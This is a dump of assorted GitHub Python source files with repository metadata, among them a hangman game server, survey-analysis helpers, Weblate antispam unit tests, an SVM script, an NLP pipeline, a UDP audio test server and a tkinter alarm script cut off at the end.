handle_disconnect(client_sock) -> None:\n try:\n print(f\"CLIENT: {client_sock.fileno()} DISCONNECTED\")\n write_to_logs(f\"CLIENT: {client_sock.fileno()} DISCONNECTED\")\n client_sock.send(\"end\".encode(FORMAT))\n client_sock.close()\n global CLIENTS_COUNTER\n CLIENTS_COUNTER -= 1\n except Exception:\n write_to_logs(\"CLIENT ALREADY DISCONNECTED\")\n print(\"CLIENT ALREADY DISCONNECTED\")\n\n\ndef handle_client(client_sock, game_id: int, client_number: int) -> None:\n \"\"\"\n :param client_sock:\n :param game_id:\n :param client_number:\n :return:\n \"\"\"\n\n first_msg = client_sock.recv(BUFF_SIZE).decode(FORMAT)\n if first_msg != \"start\":\n handle_disconnect(client_sock)\n\n while game_id not in GAMES:\n client_sock.send(\"WAITING FOR PLAYER...\\n\".encode(FORMAT))\n # client_sock.send(\"TO REFRESH TYPE refresh\\n\".encode(FORMAT))\n time.sleep(1)\n\n game = GAMES[game_id]\n client_sock.send(\"GAME HAS BEEN STARTED\\n\".encode(FORMAT))\n client_sock.send(f\"CATEGORY {game.category}\\n\".encode(FORMAT))\n client_sock.send(f\"PUT THE WORD FROM GAME CATEGORY\\n\".encode(FORMAT))\n\n start = True\n while game_id in GAMES:\n try:\n msg = client_sock.recv(BUFF_SIZE).decode(FORMAT)\n # print(msg)\n\n if start:\n game.set_words(client_number, msg)\n game.set_lives(4)\n client_sock.send(f\"PUT LETTER\\n\".encode(FORMAT))\n start = False\n else:\n game = GAMES[game_id]\n game.playing_hangman(client_number, msg)\n\n \"\"\"if somebody won\"\"\"\n if game.score():\n with game.lock:\n end_game(game_id)\n break\n\n except (EOFError, ConnectionError):\n handle_disconnect(client_sock)\n\n\nif __name__ == \"__main__\":\n game_id = 0\n\n server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n # server_sock = socket.socket()\n server_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server_sock.bind((SERVER, PORT))\n server_sock.listen(5)\n\n print(f\"SERVER STARTED ON {SERVER}:{PORT}\")\n write_to_logs(f\"SERVER STARTED ON {SERVER}:{PORT}\")\n client_1 = None\n client_number = 0\n while True:\n try:\n try:\n client, addr = server_sock.accept()\n except ConnectionError as err:\n write_to_logs(repr(err))\n print(repr(err))\n\n print(f\"CLIENT: {client.fileno()} ADDR: {addr} CONNECTED\")\n write_to_logs(f\"CLIENT: {client.fileno()} ADDR: {addr} CONNECTED\")\n\n ssl_client = ssl.wrap_socket(client,\n server_side=True,\n certfile=\"./src/server_utils/server.crt\",\n keyfile=\"./src/server_utils/server.key\",\n ssl_version=ssl.PROTOCOL_TLSv1_2)\n\n client_sock = ssl_client\n\n \"\"\"Fix CLIENTS_COUTNER\"\"\"\n # if not CLIENTS_COUNTER % 2:\n if not CLIENTS_COUNTER % 2:\n client_2 = client_sock\n client_number = 1\n GAMES[game_id // 2] = Game(client_1,\n client_2,\n FORMAT,\n BUFF_SIZE,\n threading.Lock())\n else:\n client_1 = client_sock\n client_number = 0\n\n client_thread = threading.Thread(target=handle_client,\n args=[client_sock,\n game_id // 2,\n client_number],\n daemon=True)\n client_thread.start()\n\n CLIENTS_COUNTER += 1\n game_id += 1\n except KeyboardInterrupt:\n server_sock.close()\n break\n\n","repo_name":"janjanek/hangman","sub_path":"src/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":4802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12500520144","text":"#!/usr/bin/env python3\n\nimport unittest\nfrom math import factorial\nfrom functools import reduce\nfrom operator import mul\nfrom itertools import combinations_with_replacement as comb_r\n\ndef prisoners(days):\n '''아... comb_r이 경우의 수가 지수적으로 증가하는 관꼐로 현실적 계산이 불가하다.'''\n if days < 100:\n return 0\n up1 = factorial(100)\n down1 = 100**100\n up2 = sum(reduce(mul, each) for each in comb_r(range(1, 101), days-100)) if days>100 else 1\n down2 = 100 ** (days-100)\n\n return up1 / down1 * up2 / down2\n\ndef stats():\n days = 1\n while True:\n person = 1 - (0.99)**days\n yield days, person**100\n days += 1\n\ndef prisoners_simple():\n it_stats = stats()\n thresholds = [0.5, 0.6, 0.70, 0.80, 0.90, 0.95,\\\n 0.99, 0.999, 0.9999, 0.99999, 0.999999, 0.9999999999, 1]\n for threshold in thresholds:\n while True:\n days, thres = next(it_stats)\n if threshold <= thres:\n print(\"threshold(%s): %s days\" %(thres, days))\n break\n\nclass XTest(unittest.TestCase):\n def test_method1(self):\n s = stats()\n while True:\n days, p1 = next(s)\n if days==101:\n break\n\n p2 = prisoners(101)\n self.assertEqual(p1, p2)\n\nif __name__==\"__main__\":\n prisoners_simple()\n unittest.main()\n","repo_name":"JiniousChoi/encyclopedia-in-code","sub_path":"quizzes/00.organize.me/Cracking the Coding Interview/prison_break.py","file_name":"prison_break.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"7535769978","text":"import math\nimport pandas as pd\nfrom typing import List, Tuple\n\ndef calculate_crosstab(df: pd.DataFrame, data_key1: str, data_key2: str, id_vars: str=None, astype: str=\"int\") -> pd.DataFrame:\n \"\"\"Calulate the cross table for two keys in a given pandas data frame\"\"\"\n\n if id_vars is None:\n id_vars = data_key1\n\n cols = [data_key1, data_key2]\n\n df0 = df[cols].dropna(how = \"all\", subset = cols).astype(\"category\")\n totals = dict(df0[data_key1].value_counts())\n\n df_crosstab = pd.crosstab(df[data_key1], df[data_key2],\n margins = False).reset_index().melt(id_vars = [id_vars])\n \n # include total answers by career level in cross tab\n df_crosstab[\"total\"] = df_crosstab[data_key1].map(totals).astype(astype)\n \n # calculate relative amount of answers by career level\n df_crosstab[\"percentage\"] = (df_crosstab[\"value\"] / df_crosstab[\"total\"]) * 100\n \n return df_crosstab\n\n\ndef filter_dataframe(df: pd.DataFrame, include: list=None, exclude: List[Tuple[str, list]]=None, \n exclude_nan=True, exclude_anonymized=True, as_type=\"category\") -> pd.DataFrame:\n \"\"\"\n Filter a pandas dataframe\n\n example:\n ```\n to_exclude = ['Other', 'Undergraduate / Masters student', 'Director (of the institute)']\n df = filter_dataframe(surveydata, include=[\"careerLevel\", \"docStructured\", \"researchArea\"], exclude=[(\"careerLevel\", to_exclude)])\n\n returns a dataFrame with columns [\"careerLevel\", \"docStructured\", \"researchArea\"], \n where rows which contain to_exclude values in the \"careerLevel\" column are removed\n ```\n \"\"\"\n\n\n if include is not None:\n df = df[include].dropna(how = \"all\", subset = include).astype(as_type)\n \n for key, val in exclude:\n #print(key, val)\n df = df.loc[~df[key].isin(val)]\n \n if exclude_nan:\n for key in df.keys():\n df = df.loc[~df[key].isna()]\n\n if exclude_anonymized:\n df = df.replace(to_replace=\"Anonymized\", value=\"\") \n\n return df\n\ndef get_all_values(df: pd.DataFrame, keylist: List[str], display_dict=None) -> dict:\n \"\"\"\n Count all values of a given key from a key list in a data frame and \n return these values in a dictionary sorted.\n\n \"\"\"\n if len(keylist) == 1:\n key = keylist[0]\n all_areas = df[key].value_counts()\n all_areas = all_areas.sort_index()\n data = {'All': all_areas.values, key:list(all_areas.keys())}\n else: # multiple keys now the keys become the xticks\n combined = {}\n for key in keylist:\n if display_dict is not None:\n xtick = display_dict[key]\n else:\n xtick = key\n xtick = xtick.replace(' \\n', '')\n temp = df[key]\n temp.replace(to_replace=True, value=xtick, inplace=True)\n temp.replace(to_replace=False, value=None, inplace=True)\n a = temp.value_counts()\n if a.empty:\n combined[xtick] = 0\n else:\n # greedy, there is probably a pandas way to do this...\n # there is a problem if df is empty, i.e temp.value_counts() True 0\n for i, ke in enumerate(a.keys()):\n # because other can contain all... others..\n #ke = ke.lower() # sometimes there are mixed upper and lower case keys...\n #ke = ke.replace(' \\n', '') # some are with and without breaks\n temp_val = combined.get(ke, 0)\n temp_val = temp_val + a.values[i]\n combined[ke] = temp_val\n\n #for i, ke in enumerate(a.keys()):\n # ke = ke.lower() # sometimes there are mixed upper and lower case keys...\n # ke = ke.replace(' \\n', '') # some are with and without breaks\n # temp_val = combined.get(ke, 0)\n # temp_val = temp_val + a.values[i]\n # combined[ke] = temp_val\n data = {'All' : list(combined.values()), key:list(combined.keys())}\n return data\n\n\ndef prepare_data_research_field(df: pd.DataFrame, keylist:List[str], key2:str='researchArea', sort_as=None, display_dict= None):# -> dict, list:\n \"\"\"Creates a dict dictionary with data in the form needed by the plotting functions\n \n We prepare several outputs, i.e y_keys because they can have different length and one should be able to create a \n ColumnDataSource by ColumnDataSource(data=data)\n :param df: [description]\n :type df: pd.DataFrame\n :param key: [description]\n :type key: str\n\n example:\n prepare_data_research_field(df, key=careerLevel)\n {'Cum. Sum': array([ 0, 0, 130, 128, 148, 272, 0]),\n 'careerLevel': ['Director (of the institute)',\n 'Other',\n 'PhD student',\n 'Postdoc',\n 'Principal Investigator',\n 'Research associate',\n 'Undergraduate / Masters student'],\n 'researchArea': ['Engineering Science',\n 'Physics',\n 'Life Science',\n 'Earth Science',\n 'Chemistry',\n 'Other',\n 'Psychology',\n 'Mathematics'],\n 'Engineering Science': array([ 0, 0, 47, 30, 52, 134, 0]),\n 'Physics': array([ 0, 0, 33, 38, 39, 57, 0]),\n 'Life Science': array([ 0, 0, 28, 29, 27, 33, 0]),\n 'Earth Science': array([ 0, 0, 8, 11, 18, 32, 0]),\n 'Chemistry': array([ 0, 0, 9, 12, 6, 4, 0]),\n 'Other': array([0, 0, 1, 2, 3, 6, 0]),\n 'Psychology': array([0, 0, 3, 2, 3, 2, 0]),\n 'Mathematics': array([0, 0, 1, 4, 0, 4, 0])}\n\n \"\"\"\n research_areas = list(df[key2].value_counts().keys())\n y_keys = ['Cum. Sum'] + research_areas\n # Multiple columns will be combined. A single column will be treated differently\n if len(keylist) == 1:\n key = keylist[0]\n all_areas = df[key].value_counts()\n all_areas = all_areas.sort_index()\n data = {'Cum. Sum': all_areas.values, key:list(all_areas.keys()), 'x_value': list(all_areas.keys())}\n for area in research_areas:\n area_counts = df[df[key2] == area][key].value_counts()\n area_counts = area_counts.sort_index()\n data[area] = area_counts.values\n else:\n # Cum. Sum. is buggy?\n combined = {}\n data = {}\n for key in keylist:\n if display_dict is not None:\n xtick = display_dict[key]\n else:\n xtick = key\n xtick = xtick.replace(' \\n', '')\n temp = df[key]\n temp.replace(to_replace=True, value=xtick, inplace=True)\n temp.replace(to_replace=False, value=None, inplace=True)\n a = temp.value_counts()\n # greedy, there is probably a pandas way to do this...\n # there is a problem if df is empty, i.e temp.value_counts() True 0\n if a.empty:\n combined[xtick] = 0\n else: \n for i, ke in enumerate(a.keys()):\n # because other can contain all... others..\n #ke = ke.lower() # sometimes there are mixed upper and lower case keys...\n #ke = ke.replace(' \\n', '') # some are with and without breaks\n temp_val = combined.get(ke, 0)\n temp_val = temp_val + a.values[i]\n combined[ke] = temp_val\n \n # now fill research area specifics\n for area in research_areas:\n area_counts = df[df[key2] == area][key]\n area_counts.replace(to_replace=True, value=xtick, inplace=True)\n area_counts.replace(to_replace=False, value=None, inplace=True)\n area_counts = area_counts.value_counts()\n area_counts = area_counts.sort_index()\n temp = data.get(area, [])\n #print(area_counts)\n if area_counts.empty:\n temp.append(0)\n else:\n temp.append(int(area_counts.values[0]))\n data[area] = temp\n \n data['Cum. Sum'] = list(combined.values())\n data['x_value'] = list(combined.keys())\n\n return data, y_keys\n\n'''\ndef prepare_data_research_field(df: pd.DataFrame, key:str, key2:str='researchArea', sort_as=None):# -> dict, list:\n \"\"\"Creates a dict dictionary with data in the form needed by the plotting functions\n \n We prepare several outputs, i.e y_keys because they can have different length and one should be able to create a \n ColumnDataSource by ColumnDataSource(data=data)\n :param df: [description]\n :type df: pd.DataFrame\n :param key: [description]\n :type key: str\n\n example:\n prepare_data_research_field(df, key=careerLevel)\n {'Cum. Sum': array([ 0, 0, 130, 128, 148, 272, 0]),\n 'careerLevel': ['Director (of the institute)',\n 'Other',\n 'PhD student',\n 'Postdoc',\n 'Principal Investigator',\n 'Research associate',\n 'Undergraduate / Masters student'],\n 'researchArea': ['Engineering Science',\n 'Physics',\n 'Life Science',\n 'Earth Science',\n 'Chemistry',\n 'Other',\n 'Psychology',\n 'Mathematics'],\n 'Engineering Science': array([ 0, 0, 47, 30, 52, 134, 0]),\n 'Physics': array([ 0, 0, 33, 38, 39, 57, 0]),\n 'Life Science': array([ 0, 0, 28, 29, 27, 33, 0]),\n 'Earth Science': array([ 0, 0, 8, 11, 18, 32, 0]),\n 'Chemistry': array([ 0, 0, 9, 12, 6, 4, 0]),\n 'Other': array([0, 0, 1, 2, 3, 6, 0]),\n 'Psychology': array([0, 0, 3, 2, 3, 2, 0]),\n 'Mathematics': array([0, 0, 1, 4, 0, 4, 0])}\n\n \"\"\"\n all_areas = df[key].value_counts()\n all_areas = all_areas.sort_index()\n research_areas = list(df[key2].value_counts().keys())\n data = {'Cum. Sum': all_areas.values, key:list(all_areas.keys()), 'x_value': list(all_areas.keys())}\n y_keys = ['Cum. Sum'] + research_areas\n for area in research_areas:\n area_counts = df[df[key2] == area][key].value_counts()\n area_counts = area_counts.sort_index()\n data[area] = area_counts.values\n \n return data, y_keys\n'''\n'''\ndef prepare_data_research_field(df: pd.DataFrame, key:str):\n \"\"\"AI is creating summary for prepare_data_researchfield\n\n :param df: [description]\n :type df: pd.DataFrame\n :param key: [description]\n :type key: str\n \"\"\"\n all_areas = df[key].value_counts()\n all_areas = all_areas.sort_index()\n data = {'All': {'counts': all_areas.values, 'values': list(all_areas.keys())}}\n research_areas = list(df['researchArea'].value_counts().keys())\n for area in research_areas:\n area_counts = df[df[\"researchArea\"] == area][key].value_counts()\n area_counts = area_counts.sort_index()\n data[area] = {'counts': area_counts.values, 'values': list(area_counts.keys())}\n \n return data\n'''\n\ndef percentage_to_area(data: List[float], scale_m: float=1.0) -> List[float]:\n \"\"\"\n Convert numbers in a given array to a radius, \n \n where a circle of with that radius is proportionate to the circle area \n Useful for circle plots where the area should be proportional to the value\n \"\"\"\n radius_data = [2*math.sqrt(val*scale_m/math.pi) for val in data]\n return radius_data","repo_name":"Materials-Data-Science-and-Informatics/survey_dashboard","sub_path":"survey_dashboard/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":11426,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"10296880214","text":"from unittest import TestCase, skipIf\n\nimport responses\nfrom django.http import HttpRequest\nfrom django.test.utils import override_settings\n\nfrom weblate.utils.antispam import is_spam, report_spam\n\ntry:\n import akismet # noqa: F401\n\n HAS_AKISMET = True\nexcept ImportError:\n HAS_AKISMET = False\n\n\nclass SpamTest(TestCase):\n @override_settings(AKISMET_API_KEY=None)\n def test_disabled(self):\n self.assertFalse(is_spam(\"text\", HttpRequest()))\n\n def mock_akismet(self, body, **kwargs):\n responses.add(\n responses.POST,\n \"https://key.rest.akismet.com/1.1/comment-check\",\n body=body,\n **kwargs,\n )\n responses.add(\n responses.POST,\n \"https://key.rest.akismet.com/1.1/submit-spam\",\n body=body,\n **kwargs,\n )\n responses.add(\n responses.POST, \"https://rest.akismet.com/1.1/verify-key\", body=\"valid\"\n )\n\n @skipIf(not HAS_AKISMET, \"akismet module not installed\")\n @responses.activate\n @override_settings(AKISMET_API_KEY=\"key\")\n def test_akismet_spam(self):\n self.mock_akismet(\"true\")\n self.assertFalse(is_spam(\"text\", HttpRequest()))\n\n @skipIf(not HAS_AKISMET, \"akismet module not installed\")\n @responses.activate\n @override_settings(AKISMET_API_KEY=\"key\")\n def test_akismet_definite_spam(self):\n self.mock_akismet(\"true\", headers={\"X-Akismet-Pro-Tip\": \"discard\"})\n self.assertTrue(is_spam(\"text\", HttpRequest()))\n\n @skipIf(not HAS_AKISMET, \"akismet module not installed\")\n @responses.activate\n @override_settings(AKISMET_API_KEY=\"key\")\n def test_akismet_nospam(self):\n self.mock_akismet(\"false\")\n self.assertFalse(is_spam(\"text\", HttpRequest()))\n\n @skipIf(not HAS_AKISMET, \"akismet module not installed\")\n @responses.activate\n @override_settings(AKISMET_API_KEY=\"key\")\n def test_akismet_submit_spam(self):\n self.mock_akismet(\"Thanks for making the web a better place.\")\n self.assertIsNone(report_spam(\"1.2.3.4\", \"Agent\", \"text\"))\n\n @skipIf(not HAS_AKISMET, \"akismet module not installed\")\n @responses.activate\n @override_settings(AKISMET_API_KEY=\"key\")\n def test_akismet_submit_spam_error(self):\n self.mock_akismet(\"false\")\n self.assertIsNone(report_spam(\"1.2.3.4\", \"Agent\", \"text\"))\n","repo_name":"WeblateOrg/weblate","sub_path":"weblate/utils/tests/test_antispam.py","file_name":"test_antispam.py","file_ext":"py","file_size_in_byte":2370,"program_lang":"python","lang":"en","doc_type":"code","stars":3905,"dataset":"github-code","pt":"52"} +{"seq_id":"72649606886","text":"from sklearn.svm import SVC\nfrom sklearn.metrics import accuracy_score, f1_score\nfrom sklearn.model_selection import StratifiedKFold\nimport numpy as np\n\nX = np.load('Banco/X9.npy')\ny = np.load('Banco/y9.npy')\n\n# remover todas as ocorrências das classes 1 e 4\nX = X[~np.isin(y, [1, 4])]\ny = y[~np.isin(y, [1, 4])]\n\nskf = StratifiedKFold(n_splits=10, shuffle=True, random_state=42)\nacc_scores = []\nf1_scores = []\n\nfor train_index, test_index in skf.split(X, y):\n X_train, X_test = X[train_index], X[test_index]\n y_train, y_test = y[train_index], y[test_index]\n\n svc = SVC(kernel='rbf', gamma=1, C=1000)\n\n svc.fit(X_train, y_train)\n\n y_pred = svc.predict(X_test)\n\n acc = accuracy_score(y_test, y_pred)\n f1 = f1_score(y_test, y_pred, average='macro')\n\n acc_scores.append(acc)\n f1_scores.append(f1)\n\nprint(\"Acurácia média: \", np.mean(acc_scores))\nprint(\"F1-score médio: \", np.mean(f1_scores))\n","repo_name":"JPAlkamim/model_classificator","sub_path":"SVMRestante.py","file_name":"SVMRestante.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3317675221","text":"\"\"\"\nAuthor : Quillivic Robin\nthis file enables to apply nlp pipeline such as stanza, spacy, standford or transformer \nto a list of interaction and strore it into jsonfiles\n\nDate : 30/03/2022\n\"\"\"\nimport os\nimport shutil\nimport pandas as pd\n\nimport time\n\nfrom src.utils import compute_gpu_free_memory, load_config_file, load_logger, load_pipeline, load_data\n\n\n\n\n\n\n\nif __name__==\"__main__\":\n t_start = time.time()\n\n # config and logger\n logger = load_logger(\"logging_config.yaml\")\n config = load_config_file(\"config.yaml\")\n\n\n logger.info('loading config file....')\n \n \n method = config['pipeline']['method']\n target_col = config['pipeline']['col']\n data_folder = config[\"data\"]['source_folder']\n\n outputs_nlp_folder = os.path.join(config['outputs'][\"outputs_folder\"],config['outputs'][\"nlp_folder\"])\n spe_nlp_folder = os.path.join(outputs_nlp_folder,method)\n\n \n logger.info(f\"\"\"The config file is loaded, the method use will be: {method}, \n the data folder is :{data_folder}, the saving folder will be: {spe_nlp_folder} and,\n the selected column is {target_col}\"\"\")\n\n # create folder\n if not os.path.exists(outputs_nlp_folder):\n os.mkdir(outputs_nlp_folder)\n logger.info('{outputs_nlp_folder} was created ! ')\n if not os.path.exists(spe_nlp_folder):\n os.mkdir(spe_nlp_folder)\n logger.info('{spe_nlp_folder} was created ! ')\n \n # data\n logger.info('Loading the data...')\n data = load_data(config)\n logger.info(f'Data loaded, ie {len(data)} lines')\n\n # nlp_pipeline\n pipeline = load_pipeline(method, config, logger=logger)\n logger.info('The pipeline is now loaded !')\n \n for i in range(len(data)) :\n line = data.iloc[i]\n code = line['code']\n interaction_list = line[target_col]\n if not os.path.exists(os.path.join(spe_nlp_folder,code+'_'+target_col+'.json')) :\n for interaction in interaction_list :\n result = pipeline.nlp(interaction['text'])\n interaction.update(result)\n logger.info(f\"{code} analysis is terminated\")\n # saving \n df = pd.DataFrame(interaction_list)\n file_name = os.path.join(spe_nlp_folder,code+'_'+target_col+'.pkl')\n df.to_pickle(file_name)\n logger.info(f'{file_name} Saved')\n logger.info(f'Free memory on GPU is: {compute_gpu_free_memory()}')\n\n t_end = time.time()\n d = round(t_end-t_start,2)/60\n try :\n shutil.move('./nlp_pipeline.log',os.path.join(spe_nlp_folder,'nlp_pipeline.log'))\n logger.info('Process terminated, logfile saved in folder')\n except Exception as e:\n logger.warning('Process terminated, logfile could not be saved in folder')\n logger.info(f'Process takes {d} minutes')","repo_name":"binbin83/nlp_pipeline","sub_path":"main_nlp.py","file_name":"main_nlp.py","file_ext":"py","file_size_in_byte":2801,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"5227185170","text":"import os\nimport shutil\nimport tempfile\nfrom os.path import exists, join\nfrom unittest import TestCase\n\nfrom scmultiplex.faim_hcs.hcs.Experiment import Experiment\nfrom scmultiplex.faim_hcs.records.OrganoidRecord import OrganoidRecord\nfrom scmultiplex.faim_hcs.records.PlateRecord import PlateRecord\nfrom scmultiplex.faim_hcs.records.WellRecord import WellRecord\n\n\nclass WellRecordTest(TestCase):\n def setUp(self) -> None:\n self.tmp_dir = tempfile.mkdtemp()\n root_dir = join(self.tmp_dir, \"root_dir\")\n exp_dir = join(self.tmp_dir, \"exp_dir\")\n os.mkdir(root_dir)\n os.mkdir(exp_dir)\n self.exp = Experiment(\"Experiment\", root_dir=root_dir, save_dir=exp_dir)\n self.plate = PlateRecord(\n experiment=self.exp,\n plate_id=\"plate\",\n save_dir=join(self.exp.get_experiment_dir()),\n )\n\n def tearDown(self) -> None:\n shutil.rmtree(self.tmp_dir)\n\n def test_create(self):\n well = WellRecord(\n plate=self.plate, well_id=\"well\", save_dir=self.plate.plate_dir\n )\n\n assert self.plate.wells[\"well\"] == well\n assert well.well_id == \"well\"\n assert well.plate == self.plate\n\n def test_save_and_load(self):\n well = WellRecord(\n plate=self.plate, well_id=\"E03\", save_dir=self.plate.plate_dir\n )\n\n org = OrganoidRecord(well=well, organoid_id=\"org_1\", save_dir=well.well_dir)\n\n org.raw_files[\"raw\"] = \"/test/raw.tif\"\n org.segmentations[\"seg\"] = \"/test/seg.tif\"\n org.measurements[\"meas\"] = \"/test/meas.csv\"\n org.spacings[\"raw\"] = [2, 0.161, 0.161]\n\n df = well.save()\n assert exists(\n join(self.plate.plate_dir, \"E03\", \"org_1\", \"organoid_summary.json\")\n )\n assert exists(join(self.plate.plate_dir, \"E03\", \"well_summary.json\"))\n\n well_loaded = WellRecord(\n plate=self.plate, well_id=\"E03\", save_dir=self.plate.plate_dir\n )\n well_loaded.load(df, \"well_summary\")\n assert well_loaded.well_id == \"E03\"\n assert well_loaded.organoids[\"org_1\"].organoid_id == \"org_1\"\n","repo_name":"fmi-basel/gliberal-scMultipleX","sub_path":"tests/faim_hcs/records/test_WellRecord.py","file_name":"test_WellRecord.py","file_ext":"py","file_size_in_byte":2128,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"52"} +{"seq_id":"12817017477","text":"import sys\nsys.setrecursionlimit(100000)\n\ndef solve():\n global n, cs\n\n visited = [0 for _ in range(n+1)]\n v_idx = 0\n ans = n\n for i in range(1, n + 1):\n v_idx += 1\n if visited[i] >= 1:\n continue\n\n visited[i] = v_idx\n\n g = {i:0}\n res = dfs(i, 0, g, visited, v_idx)\n ans -= res\n\n print(ans)\n\n\ndef dfs(v, depth, g, visited, v_idx):\n global n, cs\n\n nv = cs[v]\n\n # 현재 dfs말고 이전에 방문한 적이 있음\n if visited[nv] >= 1 and visited[nv] != v_idx:\n return 0\n\n if nv in g.keys():\n return (depth+1) - g[nv]\n\n visited[nv] = v_idx\n g[nv] = depth+1\n\n return dfs(nv, depth+1, g, visited, v_idx)\n\n\n\nt = int(sys.stdin.readline().strip())\nfor _ in range(t):\n n = int(sys.stdin.readline())\n cs = [0] + list(map(int, sys.stdin.readline().strip().split(\" \")))\n solve()\n","repo_name":"galid1/Algorithm","sub_path":"python/baekjoon/2.algorithm/DFS_BFS/9466.텀_프로젝트.py","file_name":"9466.텀_프로젝트.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"20550810521","text":"from django.test import tag\nfrom selenium.webdriver.common.by import By\n\nfrom langstroth.tests.base import SeleniumTestBase\n\n\n@tag('selenium')\nclass BasicSiteTests(SeleniumTestBase):\n \"\"\"Unauthenticated tests for the front page.\n \"\"\"\n\n def test_home(self):\n self.driver.get(f'{self.live_server_url}/')\n self.assertEqual(\n \"Compute Cloud Dashboard - Research Cloud Status\",\n self.driver.title)\n\n banner = self.driver.find_element(By.ID, \"status-banner\")\n self.assertEqual(\"System Status & Announcements\\n\"\n \"All is well in the cloud.\", banner.text)\n","repo_name":"NeCTAR-RC/langstroth","sub_path":"langstroth/tests/test_selenium.py","file_name":"test_selenium.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"10702230849","text":"#!/usr/bin/python3 \n\nimport json\nimport random\nimport signal\nimport socket\nimport struct\nimport sys\nimport time\nimport datetime\n\nfrom timeit import default_timer as timer\n\ndef log(text, *args, **kwargs):\n global first_log\n kwargs['file'] = sys.stdout\n print(('[{}] ' + text).format(datetime.datetime.now(), *args, **kwargs), file=sys.stdout)\n print(('[{}] ' + text).format(datetime.datetime.now(), *args, **kwargs), file=sys.stderr)\n\ndef get_ip():\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n try:\n sock.connect(('google.com', 1))\n ip = sock.getsockname()[0]\n except:\n ip = None\n finally:\n sock.close()\n return ip\n\n\ndef sigint_handler(sig, frame):\n global server\n log('Program aborted.')\n server.running = False\n server.sock.close()\n\n\ndef datagram(sock, buf, addr):\n sent = sock.sendto(buf, addr)\n log('Datagram to {}: {} bytes sent', addr, sent)\n time.sleep(0.5)\n\n\ndef pop_random(array):\n selected = int(random.random() * len(array))\n return array.pop(selected)\n\n\nclass Server:\n def __init__(self):\n self.queue = []\n self.payloads = [\n self.payload_command,\n self.payload_audio,\n self.payload_text,\n ]\n self.commands = [\n self.command_connect,\n self.command_handshake,\n self.command_disconnect,\n self.command_get_next,\n self.command_end_of_file,\n self.command_end_of_test,\n ]\n self.main_loop()\n\n def reset_queue(self):\n with open('sounds/index.json') as f:\n phrases = json.load(f)\n self.queue = []\n for out in [\"pcm\", \"txt\"]:#\"spx\", \"ops\", \"dsp\", \"txt\"]:\n for typ in [\"s1\", \"s2\", \"s3\", \"s4\", \"s5\"]:\n for i in range(5):\n self.queue.append((out, pop_random(phrases[typ])))\n\n def main_loop(self):\n log('Server started. IP: {}', get_ip())\n\n signal.signal(signal.SIGINT, sigint_handler)\n \n self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self.sock.settimeout(5)\n self.sock.bind(('0.0.0.0', 8080))\n\n self.running = True\n self.connected = None\n\n try:\n while self.running:\n try:\n data, addr = self.sock.recvfrom(65536)\n payload_type = struct.unpack('!i', data[0:4])[0]\n self.payloads[payload_type](addr, data[4:])\n except socket.timeout:\n pass\n finally:\n self.sock.close()\n\n def payload_command(self, addr, data):\n cmd = struct.unpack('!i', data)[0]\n self.commands[cmd](addr, data[4:])\n\n def payload_audio(self, data):\n log('Received audio: {}bytes', len(data))\n\n def payload_text(self, data):\n log('Received text: {}', data);\n\n def command_connect(self, addr, data):\n log('Connected to: {}', addr)\n datagram(self.sock, struct.pack('!ii', 0, 1), addr)\n self.connected = addr\n self.reset_queue()\n\n def command_handshake(self, addr, data):\n log('Connected')\n self.connected = addr\n self.reset_queue()\n \n def command_disconnect(self, addr, data):\n self.connected = None\n log('Disconnected')\n\n def command_get_next(self, addr, data):\n if len(self.queue) == 0:\n log('End of Test')\n log('')\n datagram(self.sock, struct.pack('!ii', 0, 5), addr)\n return\n\n selected = self.queue.pop(int(random.random() * len(self.queue)))\n log('Left: {}, Selected: {}', len(self.queue), selected, endl='')\n\n if selected[0] == 'pcm':\n total = 0\n with open('sounds/4_compressed/pcm_alaw/' + selected[1], 'rb') as f:\n f.seek(44)\n try:\n while True:\n rbytes = f.read(16000)\n rsize = len(rbytes)\n total += rsize\n if rsize <= 0:\n break\n datagram(self.sock, struct.pack('!i', 1) + rbytes, addr)\n except:\n raise\n datagram(self.sock, struct.pack('!ii', 0, 4), addr)\n else:\n with open('sounds/4_compressed/deepspeech/' + selected[1] + '.txt') as f:\n #with open('sounds/A_phrases/' + selected[1] + '.txt') as f:\n line = f.readline()\n datagram(self.sock, struct.pack('!i'+str(len(line)+0)+'s', 2, line.encode()), addr)\n log('')\n\n def command_end_of_file(self, addr, data):\n log('CMD EOF')\n\n def command_end_of_test(self, addr, data):\n log('CMD EOT')\n\nserver = Server()\n","repo_name":"rgd-ul-2020/public","sub_path":"code/sttts_server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":4863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71569795684","text":"from tkinter import *\nimport datetime\nfrom tkinter.messagebox import *\nfrom tkinter.ttk import *\nimport pywhatkit as kit\n\nobj = Tk()\nobj.geometry(\"400x400\")\n\n\ndef alarm():\n if c1.get() == \"AM\":\n x = int(e1.get())\n y = int(e2.get())\n if c1.get() == \"PM\":\n x = int(e1.get()) + 12\n y = int(e2.get())\n showinfo(\"notification\", \"alarm has been set\")\n while True:\n if x == datetime.datetime.now().hour and y == 